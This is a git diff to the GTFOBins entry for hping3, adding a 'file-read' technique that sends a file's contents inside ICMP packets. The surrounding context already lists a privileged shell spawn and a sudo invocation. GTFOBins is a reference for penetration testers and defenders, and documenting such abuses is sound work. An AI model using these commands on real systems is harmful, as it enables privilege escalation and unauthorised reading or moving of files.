diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md index f66954f..c33a645 100644 --- a/_gtfobins/hping3.md +++ b/_gtfobins/hping3.md @@ -8,6 +8,11 @@ functions: - code: | ./hping3 /bin/sh -p + file-read: + - description: It is possible to send specific file contents if hping3 has sufficient permission. + - code: | + hping3 --icmp 127.0.0.1 --listen --signature --safe + hping3 --icmp 127.0.0.1 --d 100 --c 2 --sign signature --file ./file.txt sudo: - code: | sudo hping3